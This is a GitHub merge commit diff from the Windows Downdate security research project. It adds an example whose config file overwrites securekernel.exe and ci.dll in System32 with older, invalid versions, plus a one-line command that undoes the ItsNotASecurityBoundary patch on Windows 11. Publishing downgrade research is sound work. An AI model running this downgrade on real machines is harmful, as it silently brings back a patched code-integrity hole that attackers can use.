Merge pull request #13 from SafeBreach-Labs/Add-ItsNotASecurityBoundary-patch-downgrade

Added ItsNotASecurityBoundary patch downgrade usage example
This commit is contained in:
Alon Leviev
2024-10-26 13:18:11 +03:00
committed by GitHub
7 changed files with 26 additions and 1 deletions
+1
View File
@@ -69,6 +69,7 @@ Windows Downdate has built-in usage examples with ready config XML files and vul
5. [**Kernel Suite Downgrade**](./examples/Kernel-Suite-Downgrade)
6. [**PPLFault Patch Downgrade**](./examples/PPLFault-Patch-Downgrade)
7. [**VBS UEFI Lock Bypass**](./examples/VBS-UEFI-Locks-Bypass)
8. [**ItsNotASecurityBoundary Patch Downgrade**](./examples/ItsNotASecurityBoundary-Patch-Downgrade)
## Further Research
Do you have in mind any Windows components that may be vulnerable to downgrades? Use Windows Downdate for further research and to find additional vulnerabilities!
@@ -0,0 +1,7 @@
<Configuration>
<UpdateFilesList>
<UpdateFile source="%CWD%\examples\ItsNotASecurityBoundary-Patch-Downgrade\UpdateFiles\invalid_securekernel.exe" destination="C:\Windows\System32\securekernel.exe" />
<UpdateFile source="%CWD%\examples\ItsNotASecurityBoundary-Patch-Downgrade\UpdateFiles\ci.dll" destination="C:\Windows\System32\ci.dll" />
<UpdateFile source="%CWD%\examples\ItsNotASecurityBoundary-Patch-Downgrade\UpdateFiles\ci.dll.mui" destination="C:\Windows\System32\en-US\ci.dll.mui" />
</UpdateFilesList>
</Configuration>
@@ -0,0 +1,17 @@
# ItsNotASecurityBoundary Patch Downgrade
This usage example downgrades the patch of [ItsNotASecurityBoundary](https://www.elastic.co/security-labs/false-file-immutability).
## Execution Steps
1. Install Windows Downdate as instructed [**here**](../../README.md)
2. Run the following command from the base repository directory
```
windows_downdate.py --config-xml examples/ItsNotASecurityBoundary-Patch-Downgrade/Config.xml
```
## Tested Versions
This usage example was tested against Windows 11 23h2 (22631.4317)
## Credits
[Gabriel Landau](https://x.com/GabrielLandau)
+1 -1
View File
@@ -23,4 +23,4 @@ There are multiple pitfalls to this key -
1. It is not documented, and the consequences of using it are unknown
2. It is not added automatically when enabling UEFI lock for VBS, so VBS is by-default vulnerable
**Update October 2024: The "Mandatory" setting was documented by Microsoft and can be found [here](https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity)**